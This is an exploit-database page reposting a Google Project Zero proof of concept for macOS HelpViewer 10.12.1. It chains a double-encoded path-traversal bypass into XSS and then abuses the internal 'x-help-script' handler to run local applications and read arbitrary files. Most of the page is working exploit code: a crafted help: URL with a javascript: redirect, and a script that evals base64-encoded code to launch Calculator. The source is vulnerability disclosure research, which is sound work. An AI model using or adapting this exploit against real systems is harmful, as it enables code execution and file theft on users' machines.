Lucene search

K
zdtGoogle Security Research1337DAY-ID-27109
HistoryFeb 24, 2017 - 12:00 a.m.

macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read Exploit

2017-02-2400:00:00
Google Security Research
0day.today
35

EPSS

0.263

Percentile

96.8%

Google Security Research

<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1040
 
HelpViewer is an application and using WebView to show a help file.
You can see it simply by the command:
open /Applications/Safari.app/Contents/Resources/Safari.help
 
or using "help:" scheme:
help:openbook=com.apple.safari.help
help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html
 
HelpViewer's WebView has an inside protocol handler "x-help-script" that could be used to open an arbitrary local file. Therefore if we can run arbitrary Javascript code, we'll win easily and, of course, we can read an arbitrary local file with a XMLHttpRequest.
 
HelpViewer checks whether the path of the url is in a valid help file or not. But we can bypass this with a double encoded "../".
 
PoC:
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)";
 
The attached poc will pop up a Calculator.
 
Tested on macOS Sierra 10.12.1 (16B2659).
-->
 
<script>
 
/*
OSX: HelpViewer XSS leads to arbitrary file execution and arbitrary file read.
 
HelpViewer is an application and using WebView to show a help file.
You can see it simply by the command:
open /Applications/Safari.app/Contents/Resources/Safari.help
 
or using "help:" scheme:
help:openbook=com.apple.safari.help
help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html
 
HelpViewer's WebView has an inside protocol handler "x-help-script" that could be used to open an arbitrary local file. Therefore if we can run arbitrary Javascript code, we'll win easily and, of course, we can read an arbitrary local file with a XMLHttpRequest.
 
HelpViewer checks whether the path of the url is in a valid help file or not. But we can bypass this with a double encoded "../".
 
PoC:
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)";
 
The attached poc will pop up a Calculator.
 
Tested on macOS Sierra 10.12.1 (16B2659).
 
*/
 
function main() {
    function second() {
        var f = document.createElement("iframe");
        f.onload = () => {
            f.contentDocument.location = "x-help-script://com.apple.machelp/scpt/OpnApp.scpt?:Applications:Calculator.app";
        };
 
        f.src = "help:openbook=com.apple.safari.help";
 
        document.documentElement.appendChild(f);
    }
 
    var url = "javascript%253aeval(atob('" + btoa(second.toString()) + "'));\nsecond();";
 
    document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=" + url;
}
 
main();
 
</script>

#  0day.today [2018-01-03]  #

EPSS

0.263

Percentile

96.8%